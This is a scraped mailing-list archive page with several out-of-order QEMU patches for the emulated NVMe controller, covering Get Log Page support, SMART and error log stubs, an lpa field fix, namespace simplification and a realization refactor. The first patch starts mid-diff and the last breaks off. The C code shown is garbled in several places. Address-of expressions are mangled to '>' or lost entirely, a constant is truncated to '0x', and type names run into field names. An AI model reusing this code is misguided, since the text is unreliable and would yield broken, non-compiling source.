+uint32_thmmin;
+uint8_t tnvmcap[16];
+uint8_t unvmcap[16];
+uint32_trpmbs;
+uint8_t rsvd319[4];
+uint16_tkas;
+uint8_t rsvd511[190];
 uint8_t sqes;
 uint8_t cqes;
-uint16_trsvd515;
+uint16_tmaxcmd;
 uint32_tnn;
 uint16_toncs;
 uint16_tfuses;
@@ -562,8 +580,14 @@ typedef struct NvmeIdCtrl {
 uint8_t vwc;
 uint16_tawun;
 uint16_tawupf;
-uint8_t rsvd703[174];
-uint8_t rsvd2047[1344];
+uint8_t nvscc;
+uint8_t rsvd531;
+uint16_tacwu;
+uint16_trsvd535;
+uint32_tsgls;
+uint8_t rsvd767[228];
+uint8_t subnqn[256];
+uint8_t rsvd2047[1024];
 NvmePSD psd[32];
 uint8_t vs[1024];
 } NvmeIdCtrl;
-- 
2.20.1

[Qemu-block] [PATCH 10/16] nvme: support Get Log Page command

2019-07-05 Thread Klaus Birkelund Jensen

Add support for the Get Log Page command and stub/dumb implementations
of the mandatory Error Information, SMART/Health Information and
Firmware Slot Information log pages.

Required for compliance with NVMe revision 1.2.1. See NVM Express 1.2.1,
Section 5.10 ("Get Log Page command").

Signed-off-by: Klaus Birkelund Jensen 
---
 hw/block/nvme.c   | 209 ++
 hw/block/nvme.h   |   3 +
 hw/block/trace-events |   3 +
 include/block/nvme.h  |   4 +-
 4 files changed, 217 insertions(+), 2 deletions(-)

diff --git a/hw/block/nvme.c b/hw/block/nvme.c
index a20576654f1b..93f5dff197e0 100644
--- a/hw/block/nvme.c
+++ b/hw/block/nvme.c
@@ -39,6 +39,8 @@
 #include "nvme.h"
 
 #define NVME_MAX_QS PCI_MSIX_FLAGS_QSIZE
+#define NVME_TEMPERATURE 0x143
+#define NVME_ELPE 3
 #define NVME_AERL 3
 #define NVME_OP_ABORTED 0xff
 #define NVME_GUEST_ERR(trace, fmt, ...) \
@@ -319,6 +321,36 @@ static void nvme_enqueue_req_completion(NvmeCQueue *cq, 
NvmeRequest *req)
 timer_mod(cq->timer, qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL) + 500);
 }
 
+static void nvme_enqueue_event(NvmeCtrl *n, uint8_t event_type,
+uint8_t event_info, uint8_t log_page)
+{
+NvmeAsyncEvent *event;
+
+trace_nvme_enqueue_event(event_type, event_info, log_page);
+
+/*
+ * Do not enqueue the event if something of this type is already queued.
+ * This bounds the size of the event queue and makes sure it does not grow
+ * indefinitely when events are not processed by the host (i.e. does not
+ * issue any AERs).
+ */
+if (n->aer_mask_queued & (1 << event_type)) {
+return;
+}
+n->aer_mask_queued |= (1 << event_type);
+
+event = g_new(NvmeAsyncEvent, 1);
+event->result = (NvmeAerResult) {
+.event_type = event_type,
+.event_info = event_info,
+.log_page   = log_page,
+};
+
+QSIMPLEQ_INSERT_TAIL(>aer_queue, event, entry);
+
+timer_mod(n->aer_timer, qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL) + 500);
+}
+
 static void nvme_process_aers(void *opaque)
 {
 NvmeCtrl *n = opaque;
@@ -831,6 +863,10 @@ static uint16_t nvme_get_feature(NvmeCtrl *n, NvmeCmd 
*cmd, NvmeRequest *req)
 uint32_t result;
 
 switch (dw10) {
+case NVME_TEMPERATURE_THRESHOLD:
+result = cpu_to_le32(n->features.temp_thresh);
+break;
+case NVME_ERROR_RECOVERY:
 case NVME_VOLATILE_WRITE_CACHE:
 result = blk_enable_write_cache(n->conf.blk);
 trace_nvme_getfeat_vwcache(result ? "enabled" : "disabled");
@@ -878,6 +914,13 @@ static uint16_t nvme_set_feature(NvmeCtrl *n, NvmeCmd 
*cmd, NvmeRequest *req)
 uint32_t dw11 = le32_to_cpu(cmd->cdw11);
 
 switch (dw10) {
+case NVME_TEMPERATURE_THRESHOLD:
+n->features.temp_thresh = dw11;
+if (n->features.temp_thresh <= n->temperature) {
+nvme_enqueue_event(n, NVME_AER_TYPE_SMART,
+NVME_AER_INFO_SMART_TEMP_THRESH, NVME_LOG_SMART_INFO);
+}
+break;
 case NVME_VOLATILE_WRITE_CACHE:
 blk_set_enable_write_cache(n->conf.blk, dw11 & 1);
 break;
@@ -902,6 +945,137 @@ static uint16_t nvme_set_feature(NvmeCtrl *n, NvmeCmd 
*cmd, NvmeRequest *req)
 return NVME_SUCCESS;
 }
 
+static void nvme_clear_events(NvmeCtrl *n, uint8_t event_type)
+{
+n->aer_mask &= ~(1 << event_type);
+if (!QSIMPLEQ_EMPTY(>aer_queue)) {
+timer_mod(n->aer_timer,
+qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL) + 500);
+}
+}
+
+static uint16_t nvme_error_log_info(NvmeCtrl *n, NvmeCmd *cmd, uint8_t rae,
+uint32_t buf_len, uint64_t off, NvmeRequest *req)
+{
+uint32_t trans_len;
+uint64_t prp1 = le64_to_cpu(cmd->prp1);
+uint64_t prp2 = le64_to_cpu(cmd->prp2);
+
+if (off > sizeof(*n->elpes) * (NVME_ELPE + 1)) {
+return NVME_INVALID_FIELD | NVME_DNR;
+}
+
+trans_len = MIN(sizeof(*n->elpes) * (NVME_ELPE + 1) - off, buf_len);
+
+if (!rae) {
+nvme_clear_events(n, NVME_AER_TYPE_ERROR);
+}
+
+return nvme_dma_read_prp(n, (uint8_t *) n->elpes + off, trans_len, prp1,
+prp2);
+}
+
+static uint16_t nvme_smart_info(NvmeCtrl *n, NvmeCmd *cmd, uint8_t rae,
+uint32_t buf_len, uint64_t off, NvmeRequest *req)
+{
+uint64_t prp1 = le64_to_cpu(cmd->prp1);
+uint64_t prp2 = le64_to_cpu(cmd->prp2);
+
+uint32_t trans_len;
+time_t current_ms;
+NvmeSmartLog smart;
+
+if (cmd->nsid != 0 && cmd->nsid != 0x) {
+trace_nvme_err(req->cqe.cid, "smart log not supported for namespace",
+NVME_INVALID_FIELD | NVME_DNR);
+return NVME_INVALID_FIELD | NVME_DNR;
+}
+
+if (off > sizeof(smart)) {
+return NVME_INVALID_FIELD | NVME_DNR;
+}
+
+trans_len = MIN(sizeof(smart) - off, buf_len);
+
+memset(, 0x0, sizeof(smart));
+smart.number_of_error_log_entries[0] = cpu_to_le64(0);
+smart.temperature[0] = n->temperature & 0xff;
+smart.temperature[1] = (n->temperature >> 8) & 0xff;
+
+

[Qemu-block] [PATCH 03/16] nvme: fix lpa field

2019-07-05 Thread Klaus Birkelund Jensen

The Log Page Attributes in the Identify Controller structure indicates
that the controller supports the SMART / Health Information log page on
a per namespace basis. It does not, given that neither this log page or
the Get Log Page command is implemented.

Signed-off-by: Klaus Birkelund Jensen 
---
 hw/block/nvme.c | 1 -
 1 file changed, 1 deletion(-)

diff --git a/hw/block/nvme.c b/hw/block/nvme.c
index a3f83f3c2135..ce2e5365385b 100644
--- a/hw/block/nvme.c
+++ b/hw/block/nvme.c
@@ -1366,7 +1366,6 @@ static void nvme_realize(PCIDevice *pci_dev, Error **errp)
 id->ieee[2] = 0xb3;
 id->oacs = cpu_to_le16(0);
 id->frmw = 7 << 1;
-id->lpa = 1 << 0;
 id->sqes = (0x6 << 4) | 0x6;
 id->cqes = (0x4 << 4) | 0x4;
 id->nn = cpu_to_le32(n->num_namespaces);
-- 
2.20.1

[Qemu-block] [PATCH 01/16] nvme: simplify namespace code

2019-07-05 Thread Klaus Birkelund Jensen

The device model currently only supports a single namespace and also
specifically sets num_namespaces to 1. Take this into account and
simplify the code.

Signed-off-by: Klaus Birkelund Jensen 
---
 hw/block/nvme.c | 26 +++---
 hw/block/nvme.h |  2 +-
 2 files changed, 8 insertions(+), 20 deletions(-)

diff --git a/hw/block/nvme.c b/hw/block/nvme.c
index 36d6a8bb3a3e..28ebaf1368b1 100644
--- a/hw/block/nvme.c
+++ b/hw/block/nvme.c
@@ -424,7 +424,7 @@ static uint16_t nvme_io_cmd(NvmeCtrl *n, NvmeCmd *cmd, 
NvmeRequest *req)
 return NVME_INVALID_NSID | NVME_DNR;
 }
 
-ns = >namespaces[nsid - 1];
+ns = >namespace;
 switch (cmd->opcode) {
 case NVME_CMD_FLUSH:
 return nvme_flush(n, ns, cmd, req);
@@ -670,7 +670,7 @@ static uint16_t nvme_identify_ns(NvmeCtrl *n, NvmeIdentify 
*c)
 return NVME_INVALID_NSID | NVME_DNR;
 }
 
-ns = >namespaces[nsid - 1];
+ns = >namespace;
 
 return nvme_dma_read_prp(n, (uint8_t *)>id_ns, sizeof(ns->id_ns),
 prp1, prp2);
@@ -1306,8 +1306,8 @@ static void nvme_realize(PCIDevice *pci_dev, Error **errp)
 {
 NvmeCtrl *n = NVME(pci_dev);
 NvmeIdCtrl *id = >id_ctrl;
+NvmeIdNs *id_ns = >namespace.id_ns;
 
-int i;
 int64_t bs_size;
 uint8_t *pci_conf;
 
@@ -1347,7 +1347,6 @@ static void nvme_realize(PCIDevice *pci_dev, Error **errp)
 n->reg_size = pow2ceil(0x1004 + 2 * (n->num_queues + 1) * 4);
 n->ns_size = bs_size / (uint64_t)n->num_namespaces;
 
-n->namespaces = g_new0(NvmeNamespace, n->num_namespaces);
 n->sq = g_new0(NvmeSQueue *, n->num_queues);
 n->cq = g_new0(NvmeCQueue *, n->num_queues);
 
@@ -1416,20 +1415,10 @@ static void nvme_realize(PCIDevice *pci_dev, Error 
**errp)
 
 }
 
-for (i = 0; i < n->num_namespaces; i++) {
-NvmeNamespace *ns = >namespaces[i];
-NvmeIdNs *id_ns = >id_ns;
-id_ns->nsfeat = 0;
-id_ns->nlbaf = 0;
-id_ns->flbas = 0;
-id_ns->mc = 0;
-id_ns->dpc = 0;
-id_ns->dps = 0;
-id_ns->lbaf[0].ds = BDRV_SECTOR_BITS;
-id_ns->ncap  = id_ns->nuse = id_ns->nsze =
-cpu_to_le64(n->ns_size >>
-id_ns->lbaf[NVME_ID_NS_FLBAS_INDEX(ns->id_ns.flbas)].ds);
-}
+id_ns->lbaf[0].ds = BDRV_SECTOR_BITS;
+id_ns->ncap  = id_ns->nuse = id_ns->nsze =
+cpu_to_le64(n->ns_size >>
+id_ns->lbaf[NVME_ID_NS_FLBAS_INDEX(id_ns->flbas)].ds);
 }
 
 static void nvme_exit(PCIDevice *pci_dev)
@@ -1437,7 +1426,6 @@ static void nvme_exit(PCIDevice *pci_dev)
 NvmeCtrl *n = NVME(pci_dev);
 
 nvme_clear_ctrl(n);
-g_free(n->namespaces);
 g_free(n->cq);
 g_free(n->sq);
 
diff --git a/hw/block/nvme.h b/hw/block/nvme.h
index 557194ee1954..40cedb1ec932 100644
--- a/hw/block/nvme.h
+++ b/hw/block/nvme.h
@@ -83,7 +83,7 @@ typedef struct NvmeCtrl {
 uint64_ttimestamp_set_qemu_clock_ms;/* QEMU clock time */
 
 char*serial;
-NvmeNamespace   *namespaces;
+NvmeNamespace   namespace;
 NvmeSQueue  **sq;
 NvmeCQueue  **cq;
 NvmeSQueue  admin_sq;
-- 
2.20.1

[Qemu-block] [PATCH 08/16] nvme: refactor device realization

2019-07-05 Thread Klaus Birkelund Jensen

Signed-off-by: Klaus Birkelund Jensen 
---
 hw/block/nvme.c | 196 ++--
 hw/block/nvme.h |  11 +++
 2 files changed, 152 insertions(+), 55 deletions(-)

diff --git a/hw/block/nvme.c b/hw/block/nvme.c
index 4b9ff51868c0..eb6af6508e2d 100644
--- a/hw/block/nvme.c
+++ b/hw/block/nvme.c
@@ -38,6 +38,7 @@
 #include "trace.h"
 #include "nvme.h"
 
+#define NVME_MAX_QS PCI_MSIX_FLAGS_QSIZE
 #define NVME_OP_ABORTED 0xff
 #define NVME_GUEST_ERR(trace, fmt, ...) \
 do { \
@@ -1365,66 +1366,105 @@ static const MemoryRegionOps nvme_cmb_ops = {
 },
 };
 
-static void nvme_realize(PCIDevice *pci_dev, Error **errp)
+static int nvme_check_constraints(NvmeCtrl *n, Error **errp)
 {
-NvmeCtrl *n = NVME(pci_dev);
-NvmeIdCtrl *id = >id_ctrl;
-NvmeIdNs *id_ns = >namespace.id_ns;
-
-int64_t bs_size;
-uint8_t *pci_conf;
-
-if (!n->params.num_queues) {
-error_setg(errp, "num_queues can't be zero");
-return;
-}
+NvmeParams *params = >params;
 
 if (!n->conf.blk) {
-error_setg(errp, "drive property not set");
-return;
+error_setg(errp, "nvme: block backend not configured");
+return 1;
 }
 
-bs_size = blk_getlength(n->conf.blk);
-if (bs_size < 0) {
-error_setg(errp, "could not get backing file size");
-return;
+if (!params->serial) {
+error_setg(errp, "nvme: serial not configured");
+return 1;
 }
 
-if (!n->params.serial) {
-error_setg(errp, "serial property not set");
-return;
+if ((params->num_queues < 1 || params->num_queues > NVME_MAX_QS)) {
+error_setg(errp, "nvme: invalid queue configuration");
+return 1;
 }
+
+return 0;
+}
+
+static int nvme_init_blk(NvmeCtrl *n, Error **errp)
+{
 blkconf_blocksizes(>conf);
 if (!blkconf_apply_backend_options(>conf, blk_is_read_only(n->conf.blk),
-   false, errp)) {
-return;
+false, errp)) {
+return 1;
 }
 
-pci_conf = pci_dev->config;
-pci_conf[PCI_INTERRUPT_PIN] = 1;
-pci_config_set_prog_interface(pci_dev->config, 0x2);
-pci_config_set_class(pci_dev->config, PCI_CLASS_STORAGE_EXPRESS);
-pcie_endpoint_cap_init(pci_dev, 0x80);
+return 0;
+}
 
+static void nvme_init_state(NvmeCtrl *n)
+{
 n->num_namespaces = 1;
 n->reg_size = pow2ceil(0x1004 + 2 * (n->params.num_queues + 1) * 4);
-n->ns_size = bs_size / (uint64_t)n->num_namespaces;
-
 n->sq = g_new0(NvmeSQueue *, n->params.num_queues);
 n->cq = g_new0(NvmeCQueue *, n->params.num_queues);
+}
 
-memory_region_init_io(>iomem, OBJECT(n), _mmio_ops, n,
-  "nvme", n->reg_size);
+static void nvme_init_cmb(NvmeCtrl *n, PCIDevice *pci_dev)
+{
+NVME_CMBLOC_SET_BIR(n->bar.cmbloc, 2);
+NVME_CMBLOC_SET_OFST(n->bar.cmbloc, 0);
+
+NVME_CMBSZ_SET_SQS(n->bar.cmbsz, 1);
+NVME_CMBSZ_SET_CQS(n->bar.cmbsz, 1);
+NVME_CMBSZ_SET_LISTS(n->bar.cmbsz, 0);
+NVME_CMBSZ_SET_RDS(n->bar.cmbsz, 1);
+NVME_CMBSZ_SET_WDS(n->bar.cmbsz, 1);
+NVME_CMBSZ_SET_SZU(n->bar.cmbsz, 2);
+NVME_CMBSZ_SET_SZ(n->bar.cmbsz, n->params.cmb_size_mb);
+
+n->cmbloc = n->bar.cmbloc;
+n->cmbsz = n->bar.cmbsz;
+
+n->cmbuf = g_malloc0(NVME_CMBSZ_GETSIZE(n->bar.cmbsz));
+memory_region_init_io(>ctrl_mem, OBJECT(n), _cmb_ops, n,
+"nvme-cmb", NVME_CMBSZ_GETSIZE(n->bar.cmbsz));
+pci_register_bar(pci_dev, NVME_CMBLOC_BIR(n->bar.cmbloc),
+PCI_BASE_ADDRESS_SPACE_MEMORY | PCI_BASE_ADDRESS_MEM_TYPE_64 |
+PCI_BASE_ADDRESS_MEM_PREFETCH, >ctrl_mem);
+}
+
+static void nvme_init_pci(NvmeCtrl *n, PCIDevice *pci_dev)
+{
+uint8_t *pci_conf = pci_dev->config;
+
+pci_conf[PCI_INTERRUPT_PIN] = 1;
+pci_config_set_prog_interface(pci_conf, 0x2);
+pci_config_set_vendor_id(pci_conf, PCI_VENDOR_ID_INTEL);
+pci_config_set_device_id(pci_conf, 0x5845);
+pci_config_set_class(pci_conf, PCI_CLASS_STORAGE_EXPRESS);
+pcie_endpoint_cap_init(pci_dev, 0x80);
+
+memory_region_init_io(>iomem, OBJECT(n), _mmio_ops, n, "nvme",
+n->reg_size);
 pci_register_bar(pci_dev, 0,
 PCI_BASE_ADDRESS_SPACE_MEMORY | PCI_BASE_ADDRESS_MEM_TYPE_64,
 >iomem);
 msix_init_exclusive_bar(pci_dev, n->params.num_queues, 4, NULL);
 
+if (n->params.cmb_size_mb) {
+nvme_init_cmb(n, pci_dev);
+}
+}
+
+static void nvme_init_ctrl(NvmeCtrl *n)
+{
+NvmeIdCtrl *id = >id_ctrl;
+NvmeParams *params = >params;
+uint8_t *pci_conf = n->parent_obj.config;
+
 id->vid = cpu_to_le16(pci_get_word(pci_conf + PCI_VENDOR_ID));
 id->ssvid = cpu_to_le16(pci_get_word(pci_conf + PCI_SUBSYSTEM_VENDOR_ID));
 strpadcpy((char *)id->mn, sizeof(id->mn), "QEMU NVMe Ctrl", ' ');
 strpadcpy((char *)id->fr, sizeof(id->fr), "1.0", ' ');
-strpadcpy((char *)id->sn, sizeof(id->sn), n->params.serial, ' ');
+strpadcpy((char

87 matches

Mail list logo